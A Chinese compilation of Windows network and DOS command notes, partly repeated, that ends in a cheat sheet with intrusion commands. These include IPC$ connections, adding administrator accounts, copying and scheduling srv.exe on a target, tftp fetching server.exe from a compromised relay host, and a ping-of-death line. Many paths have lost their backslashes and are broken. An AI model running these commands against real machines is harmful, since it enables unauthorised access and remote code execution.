执行特定次数的Ping命令。 二、Netstat 命令的使用技巧 Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据,一般用于检验本机各端口的网络连接情况。 如果我们的计算机有时候接受到的数据报会导致出错数据删除或故障,我们不必感到奇怪,TCP/IP可以容许这些类型的错误,并能够自动重发数据报。但如果累计的出错情况数目占到所接收的IP数据报相当大的百分比,或者它的数目正迅速增加,那么我们就应该使用Netstat查一查为什么会出现这些情况了。 1、netstat 的一些常用选项 netstat –s 本选项能够按照各个协议分别显示其统计数据。如果我们的应用程序(如Web浏览器)运行速度比较慢,或者不能显示Web页之类的数据,那么我们就可以用本选项来查看一下所显示的信息。我们需要仔细查看统计数据的各行,找到出错的关键字,进而确定问题所在。 netstat –e 本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量,也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量)。 netstat –r 本选项可以显示关于路由表的信息,类似于后面所讲使用route print命令时看到的 信息。除了显示有效路由外,还显示当前有效的连接。 netstat –a 本选项显示一个所有的有效连接信息列表,包括已建立的连接(ESTABLISHED),也包括监听连接请求(LISTENING)的那些连接。 netstat –n 显示所有已建立的有效连接。 下面是 netstat 的输出示例: C:\>netstat -e Interface Statistics
Received Sent
Bytes 3995837940 47224622
Unicast packets 120099 131015
Non-unicast packets 7579544 3823
Discards 0 0
Errors 0 0
Unknown protocols 363054211 C:\>netstat -a Active Connections
Proto Local Address Foreign Address State
TCP CORP1:1572 172.16.48.10:nbsession ESTABLISHED
TCP CORP1:1589 172.16.48.10:nbsession ESTABLISHED
UDP CORP1:1025 *:*
UDP CORP1:snmp *:*
UDP CORP1:nbname *:* C:\>netstat -s IP Statistics
Packets Received = 5378528
Received Header Errors = 738854
Received Address Errors = 23150
Datagrams Forwarded = 0
Unknown Protocols Received = 0
Received Packets Discarded = 0
Received Packets Delivered = 4616524
Output Requests = 132702
Routing Discards = 157 2、Netstat的妙用 经常上网的人一般都使用ICQ的,不知道我们有没有被一些讨厌的人骚扰,想投诉却又不知从和下手?其实,我们只要知道对方的IP,就可以向他所属的ISP投诉了。但怎样才能通过ICQ知道对方的IP呢?如果对方在设置ICQ时选择了不显示IP地址,那我们是无法在信息栏中看到的。其实,我们只需要通过Netstat就可以很方便的做到这一点:当他通过ICQ或其他的工具与我们相连时(例如我们给他发一条ICQ信息或他给我们发一条信息),我们立刻在DOS 命令提示符下输入netstat -n或netstat -a就可以看到对方上网时所用的IP或ISP域名了,甚至连所用Port都完全暴露了。 三、IPConfig命令的使用技巧 IPConfig实用程序和它的等价图形用户界面----Windows 95/98中的WinIPCfg可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。
但是,如果我们的计算机和所在的局域网使用了动态主机配置协议(DHCP),这个程序所显示的信息也许更加实用。这时,IPConfig可以让我们了解自己的计算机是否成功的租用到一个IP地址,如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。 1、IPConfig最常用的选项 ipconfig 当使用IPConfig时不带任何参数选项,那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值。 ipconfig /all 当使用all选项时,IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息(如IP地址等),并且显示内置于本地网卡中的物理地址(MAC)。如果IP地址是从DHCP服务器租用的,IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期。 ipconfig /release和ipconfig /renew 这是两个附加选项,只能在向DHCP服务器租用其IP地址的计算机上起作用。如果我们输入ipconfig /release,那么所有接口的租用IP地址便重新交付给DHCP服务器(归还IP地址)。如果我们输入ipconfig /renew,那么本地计算机便设法与DHCP服务器取得联系,并租用一个IP地址。请注意,大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。 下面的范例是 ipconfig /all 命令输出,该计算机配置成使用 DHCP 服务器动态配置 TCP/IP,并使用 WINS 和 DNS 服务器解析名称。 Windows 2000 IP Configuration Node Type.. . . . . . . . : Hybrid IP Routing Enabled.. . . . : No WINS Proxy Enabled.. . . . : No Ethernet adapter Local Area Connection: Host Name.. . . . . . . . : corp1.microsoft.com DNS Servers . . . . . . . : 10.1.0.200 Description. . . . . . . : 3Com 3C90x Ethernet Adapter Physical Address. . . . . : 00-60-08-3E-46-07 DHCP Enabled.. . . . . . . : Yes Autoconfiguration Enabled.: Yes IP Address. . . . . . . . . : 192.168.0.112 Subnet Mask. . . . . . . . : 255.255.0.0 Default Gateway. . . . . . : 192.168.0.1 DHCP Server. . . . . . . . : 10.1.0.50 Primary WINS Server. . . . : 10.1.0.101 Secondary WINS Server. . . : 10.1.0.102 Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM 如果我们使用的是Windows 95/98,那么我们应该更习惯使用winipcfg而不是ipconfig,因为它是一个图形用户界面,而且所显示的信息与ipconfig相同,并且也提供发布和更新动态IP地址的选项。 四、ARP(地址转换协议)的使用技巧 ARP是一个重要的TCP/IP协议,并且用于确定对应IP地址的网卡物理地址。实用arp命令,我们能够查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外,使用arp命令,也可以用人工方式输入静态的网卡物理/IP地址对,我们可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项作,有助于减少网络上的信息量。 按照缺省设置,ARP高速缓存中的项目是动态的,每当发送一个指定地点的数据报且高速缓存中不存在当前项目时,ARP便会自动添加该项目。一旦高速缓存的项目被输入,它们就已经开始走向失效状态。例如,在Windows NT/2000网络中,如果输入项目后不进一步使用,物理/IP地址对就会在2至10分钟内失效。因此,如果ARP高速缓存中项目很少或根本没有时,请不要奇怪,通过另一台计算机或路由器的ping命令即可添加。所以,需要通过arp命令查看高速缓存中的内容时,请最好先ping 此台计算机(不能是本机发送ping命令)。 ARP常用命令选项: arp -a或arp –g 用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的,多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项,而Windows用的是arp -a(-a可被视为all,即全部的意思),但它也可以接受比较传统的-g选项。 arp -a IP 如果我们有多个网卡,那么使用arp -a加上接口的IP地址,就可以只显示与该接口相关的ARP缓存项目。 arp -s IP 物理地址 我们可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态,或者在出现错误时,人工配置的物理地址将自动更新该项目。 arp -d IP 使用本命令能够人工删除一个静态项目。 例如我们在命令提示符下,键入 Arp –a;如果我们使用过 Ping 命令测试并验证从这台计算机到 IP 地址为 10.0.0.99 的主机的连通性,则 ARP 缓存显示以下项: Interface:10.0.0.1 on interface 0x1 Internet Address Physical Address Type 10.0.0.99 00-e0-98-00-7c-dc dynamic 在此例中,缓存项指出位于 10.0.0.99 的远程主机解析成 00-e0-98-00-7c-dc 的媒体访问控制地址,它是在远程计算机的网卡硬件中分配的。媒体访问控制地址是计算机用于与网络上远程 TCP/IP 主机物理通讯的地址。 至此我们可以用ipconfig和ping命令来查看自己的网络配置并判断是否正确、可以用netstat查看别人与我们所建立的连接并找出ICQ使用者所隐藏的IP信息、可以用arp查看网卡的MAC地址。 五、Tracert、Route 与 NBTStat的使用技巧 1、Tracert的使用技巧 如果有网络连通性问题,可以使用 tracert 命令来检查到达的目标 IP 地址的路径并记录结果。tracert 命令显示用于将数据包从计算机传递到目标位置的一组 IP 路由器,以及每个跃点所需的时间。如果数据包不能传递到目标,tracert 命令将显示成功转发数据包的最后一个路由器。当数据报从我们的计算机经过多个网关传送到目的地时,Tracert命令可以用来跟踪数据报使用的路由(路径)。该实用程序跟踪的路径是源计算机到目的地的一条路径,不能保证或认为数据报总遵循这个路径。如果我们的配置使用DNS,那么我们常常会从所产生的应答中得到城市、地址和常见通信公司的名字。Tracert是一个运行得比较慢的命令(如果我们指定的目标地址比较远),每个路由器我们大约需要给它15秒钟。 Tracert的使用很简单,只需要在tracert后面跟一个IP地址或URL,Tracert会进行相应的域名转换的。 tracert 最常见的用法: tracert IP address [-d] 该命令返回到达 IP 地址所经过的路由器列表。通过使用 -d 选项,将更快地显示路由器路径,因为 tracert 不会尝试解析路径中路由器的名称。 Tracert一般用来检测故障的位置,我们可以用tracert IP在哪个环节上出了问题,虽然还是没有确定是什么问题,但它已经告诉了我们问题所在的地方,我们也就可以很有把握的告诉别人----某某地方出了问题。 2、Route 的使用技巧 大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器,因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题,该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。 但是,当网络上拥有两个或多个路由器时,我们就不一定想只依赖缺省网关了。实际上我们可能想让我们的某些远程IP地址通过某个特定的路由器来传递,而其他的远程IP则通过另一个路由器来传递。 在这种情况下,我们需要相应的路由信息,这些信息储存在路由表中,每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下,必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的。 一般使用选项: route print 本命令用于显示路由表中的当前项目,在单路由器网段上的输出;由于用IP地址配置了网卡,因此所有的这些项目都是自动添加的。 route add 使用本命令,可以将信路由项目添加给路由表。例如,如果要设定一个到目的网络209.98.32.33的路由,其间要经过5个路由器网段,首先要经过本地网络上的一个路由器,器IP为202.96.123.5,子网掩码为255.255.255.224,那么我们应该输入以下命令: route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5 route change 我们可以使用本命令来修改数据的传输路由,不过,我们不能使用本命令来改变数据的目的地。下面这个例子可以将数据的路由改到另一个路由器,它采用一条包含3个网段的更直的路径: route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3 route delete 使用本命令可以从路由表中删除路由。例如:route delete 209.98.32.33 3、NBTStat的使用技巧 使用 nbtstat 命令释放和刷新 NetBIOS 名称。NBTStat(TCP/IP上的NetBIOS统计数据)实用程序用于提供关于关于NetBIOS的统计数据。运用NetBIOS,我们可以查看本地计算机或远程计算机上的NetBIOS名字表格。 常用选项: nbtstat –n 显示寄存在本地的名字和服务程序。 nbtstat –c 本命令用于显示NetBIOS名字高速缓存的内容。NetBIOS名字高速缓存用于寸放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。 nbtstat –r 本命令用于清除和重新加载NetBIOS名字高速缓存。 nbtstat -a IP 通过IP显示另一台计算机的物理地址和名字列表,我们所显示的内容就像对方计算机自己运行nbtstat -n一样。 nbtstat -s IP 显示实用其IP地址的另一台计算机的NetBIOS连接表。 例如我们在命令提示符下,键入:nbtstat –RR 释放和刷新过程的进度以命令行输出的形式显示。
该信息表明当前注册在该计算机的 WINS 中的所有本地 NetBIOS 名称是否已经使用 WINS 服务器释放和续订了注册。 常用网络命令(windows)
Ping命令的常用参数选项
·ping IP –t 连续对IP地址执行Ping命令,直到被用户以Ctrl+C中断。
·ping IP -l 3000 指定Ping命令中的数据长度为3000字节,而不是缺省的32字节。
·ping IP –n 执行特定次数的Ping命令。
netstat 的一些常用选项
·netstat –s 本选项能够按照各个协议分别显示其统计数据。如果我们的应用程序(如Web浏览器)运行速度比较慢,或者不能显示Web页之类的数据,那么我们就可以用本选项来查看一下所显示的信息。我们需要仔细查看统计数据的各行,找到出错的关键字,进而确定问题所在。
·netstat –e 本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量,也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量)。
·netstat –r 本选项可以显示关于路由表的信息,类似于后面所讲使用route print命令时看到的 信息。除了显示有效路由外,还显示当前有效的连接。
·netstat –a 本选项显示一个所有的有效连接信息列表,包括已建立的连接(ESTABLISHED),也包括监听连接请求(LISTENING)的那些连接。
·netstat –n 显示所有已建立的有效连接。
IPConfig最常用的选项
·ipconfig 当使用IPConfig时不带任何参数选项,那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值。
·ipconfig /all 当使用all选项时,IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息(如IP地址等),并且显示内置于本地网卡中的物理地址(MAC)。如果IP地址是从DHCP服务器租用的,IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期。
·ipconfig /release和ipconfig /renew 这是两个附加选项,只能在向DHCP服务器租用其IP地址的计算机上起作用。如果我们输入ipconfig /release,那么所有接口的租用IP地址便重新交付给DHCP服务器(归还IP地址)。如果我们输入ipconfig /renew,那么本地计算机便设法与DHCP服务器取得联系,并租用一个IP地址。请注意,大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。
ARP常用命令选项:
·arp -a或arp –g 用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的,多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项,而Windows用的是arp -a(-a可被视为all,即全部的意思),但它也可以接受比较传统的-g选项。
·arp -a IP 如果我们有多个网卡,那么使用arp -a加上接口的IP地址,就可以只显示与该接口相关的ARP缓存项目。
·arp -s IP 物理地址 我们可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态,或者在出现错误时,人工配置的物理地址将自动更新该项目。
·arp -d IP 使用本命令能够人工删除一个静态项目。
例如我们在命令提示符下,键入 Arp –a;如果我们使用过 Ping 命令测试并验证从这台计算机到 IP 地址为 10.0.0.99 的主机的连通性,则 ARP 缓存显示以下项:
Interface:10.0.0.1 on interface 0x1 Internet Address Physical Address Type 10.0.0.99 00-e0-98-00-7c-dc dynamic
在此例中,缓存项指出位于 10.0.0.99 的远程主机解析成 00-e0-98-00-7c-dc 的媒体访问控制地址,它是在远程计算机的网卡硬件中分配的。媒体访问控制地址是计算机用于与网络上远程 TCP/IP 主机物理通讯的地址。
Route 的使用技巧
大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器,因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题,该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。
但是,当网络上拥有两个或多个路由器时,我们就不一定想只依赖缺省网关了。实际上我们可能想让我们的某些远程IP地址通过某个特定的路由器来传递,而其他的远程IP则通过另一个路由器来传递。
在这种情况下,我们需要相应的路由信息,这些信息储存在路由表中,每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下,必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的。
一般使用选项:
·route print 本命令用于显示路由表中的当前项目,在单路由器网段上的输出;由于用IP地址配置了网卡,因此所有的这些项目都是自动添加的。
·route add 使用本命令,可以将信路由项目添加给路由表。例如,如果要设定一个到目的网络209.98.32.33的路由,其间要经过5个路由器网段,首先要经过本地网络上的一个路由器,器IP为202.96.123.5,子网掩码为255.255.255.224,那么我们应该输入以下命令:
route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5
·route change 我们可以使用本命令来修改数据的传输路由,不过,我们不能使用本命令来改变数据的目的地。下面这个例子可以将数据的路由改到另一个路由器,它采用一条包含3个网段的更直的路径:
route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3
·route delete 使用本命令可以从路由表中删除路由。例如:route delete 209.98.32.33
tracert 最常见的用法:
tracert IP address [-d] 该命令返回到达 IP 地址所经过的路由器列表。通过使用 -d 选项,将更快地显示路由器路径,因为 tracert 不会尝试解析路径中路由器的名称。
域名反向解析查看命令
nslookup –qt=ptr yourIP
一、ping
主要是测试本机TCP/IP协议配置正确性与当前网络现状.
ping命令的基本使用格式是: ping IP地址/主机名/域名 [-t] [-a] [-n count] [-l size]
-t:连续对IP地址/主机名/域名执行Ping命令,直到被用户以Ctrl+C中断.
-a:以IP地址格式显示目标主机网络地址,默认选项.
-n count:指定要Ping多少次,具体次数由count来指定,默认值为4.
-l size:指定Ping命令中发送的数据长度,默认值是32字节.
二、netstat
主要是帮助了解整体网络情况以及当前连接情况.
基本使用命令格式:netstat [-n] [-a] [-e] [-r][-s]
-n:显示所有已建立的有效连接.
-s:本选项能够按照各个协议分别显示其统计数据。如果应用程序(如Web浏览器)运行速度比较慢,或者不能显示Web页之类的数据,那么我们就可以用本选项来查看一下所显示的信息.我们需要仔细查看统计数据的各行,找到出错的关键字,进而确定问题所在.
-e:本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量,也有接收的数据报数量.(这个选项可以用来统计一些基本的网络流量)
-r:本选项可以显示关于路由表的信息,除了显示有效路由外,还显示当前有效的连接.
-a:本选项显示一个所有的有效连接信息列表,包括已建立的连接(ESTABLISHED),也包括监听连接请求(LISTENING)的那些连接.
三、ipconfig
主要是了解当前TCP/IP协议所设置的值,如IP地址、子网掩码、缺省网关、Mac地址等.
基本使用方法:ipconfig [/all/release/renew]
ipconfig:当不带任何参数选项,那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值.
/all:当使用all选项时,能为DNS和WINS服务器显示它已配置且所要使用的附加信息(如IP地址等),并且显示内置于本地网卡中的物理地址(MAC).如果IP地址是从DHCP服务器租用的,它会显示DHCP服务器的IP地址和租用地址预计失效的日期.
/release & /renew :这是两个附加选项,只能在向DHCP服务器租用其IP地址的计算机上起作用.如果我输入ipconfig/release,那么所有接口的租用IP地址便重新交付给DHCP服务器(归还IP地址).如果输入ipconfig /renew,那么本地计算机便设法与DHCP服务器取得联系,并租用一个IP地址.请注意,大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址.
四、route
主要用于配置路由与查看当前路由情况.
基本使用方法:route [print] [add] [change] [delete]
print:主要是打印当前路由情况.
add:手动添加路由或配路由,例子如下:
route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3 IF 2 destination^ (目标地址) ^mask ^gateway metric^ ^
Interface^ (接口)
|
change:只用于修改网关和/或跃点数.例子如下:
route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2 |
delete:删除路由.例子如下:
route DELETE 157.0.0.0 |
五、tracert(trace router的缩写,为路由跟踪命令)
主要用于显示将数据包从计算机传递到目标位置的一组IP路由器,以及每个跃点所需的时间(即跟踪数据报传送路径),测试网络连通性问题.
基本用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name(目标IP、URL或域名) 选项: -d 不将地址解析成主机名.
-h maximum_hops 搜索目标的最大跃点数.
-j host-list 与主机列表一起的松散源路由(仅适用于 IPv4).
-w timeout 等待每个回复的超时时间(以毫秒为单位).
-R 跟踪往返行程路径(仅适用于 IPv6).
-S srcaddr 要使用的源地址(仅适用于 IPv6).
-4 强制使用 IPv4.
-6 强制使用 IPv6.
|
六、ARP(Address Resolution Protocol,地址解析协议,是获取物理地址的一个TCP/IP协议.)
主要用来查看本地计算机或另一台计算机的ARP高速缓存中的当前内容.
基本使用方法:arp [-a/g] [-s] [-d]
-a:用于查看高速缓存中的所有项目,-a和-g参数的结果是一样的.
-s:向ARP高速缓存中人工输入一个静态ARP项目.
-d:删除ARP高速缓存中的内容.
结果分析
1,ipconfig显示本机ip地址配置情况。
2,ipconfig/all显示本机IP地址配置等情况的详细信息。
3,ping指令测试网络的连通性,发送4个ICMP的类型8报文给对方,对方回应4个ICMP类型的报文给本机。
4,ping –t不停发送ICPM的类型8报文给对方,只要对方存活,就会一直发。
5,arp –a显示本机arp缓存的内容,对方IP地址和对方MAC地址的对应关系。
6,arp –d删除本机的arp缓存区,清除IP地址与MAC地址的对应关系。
7,arp –s绑定本机中的arp缓存中的ip地址与mac地址的对应关系为静态关系。
8,neststat –an显示本机的网络连接情况。
9,nslookup 用于域名解析的指令,可以解析出域名所对应的ip地址。
10, tracert : trace route的缩写,表示路由跟踪。
Dos命令下多文件中查找某字符串
findstr /s/i "WndProc" *.*
在DOS下进行,“WndProc”为要查找的字符串。查找当前目录ixia的*.*文件。 批处理文件可以写成如下形式:
@echo off
for %%i in (C:\Users\Administrator\Desktop\New\CyUSB\*.*) do (type %%i |findstr "WndProc">nul && echo %%~nxi)
pause
文件内容比较
利用FC命令就可以进行比较。FC命令是DOS下的一个常用命令,在Windows中同样适用。你将两份记事本文件保存在同一文件夹中,例如 D:\TXT,并分别命名为1.txt、2.txt;然后在运行中输入Cmd打开命令提示符窗口,并用CD命令进入D:\TXT,最后输入Fc 1.txt 2.txt回车后就可以看到两者之间的不同了。
运用命令玩转Windows 近来做项目实施,发现自己对常用的命令不熟悉,给工作带来了一定的麻烦,尤其是你的项目给用户提供的是解决方案,而不是简单对setup的软件。
dxdiag 查看当前电脑的硬件配置
nbstat -a IP 查看网络是否畅通
hostname 获取主机
nslookup IP
tracert IP
ipconfig /all
ipconfig /release
ipconfig /renew
ipconfig /flushdns
ipconfig /displaydns
helo 域名
mail from:发件人
rcpt to:收件人
远程桌面的快捷方式属性中添加参数/console后,只能有一个用户连接到服务器上。
inetmgr打开的是IIS的管理界面
iisreset重启本机的IIS服务.
net use ipipc$ " " /user:" " //建立IPC空链接
net use ipipc$ "密码" /user:"用户名" //建立IPC非空链接
net use h: ipc$ "密码" /user:"用户名" //直接登陆后映射对方C:到本地为H:
net use h: ipc$ //登陆后映射对方C:到本地为H:
net use ipipc$ /del //删除IPC链接
net use h: /del //删除映射对方到本地的为H:的映射
net user 用户名 密码 /add //建立用户
net user guest /active:yes //激活guest用户
net user //查看有哪些用户
net user //帐户名 查看帐户的属性
net localgroup administrators 用户名 /add //把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start //查看开启了哪些服务
net start 服务名 //开启服务;(如:net start telnet, net start schedule)
net stop 服务名 //停止某服务
net time 目标ip //查看对方时间
net time 目标ip /set //设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view //查看本地局域网内开启了哪些共享
net view ip //查看对方局域网内开启了哪些共享
net config //显示系统网络设置
net logoff //断开连接的共享
net pause //服务名 暂停某服务
net send ip //"文本信息" 向对方发信息
net ver //局域网内正在使用的网络连接类型和信息
net share //查看本地开启的共享
net share ipc$ //开启ipc$共享
net share ipc$ /del //删除ipc$共享
net share c$ /del //删除C:共享
net user guest 12345 //用guest用户登陆后用将密码改为12345
net password 密码 //更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )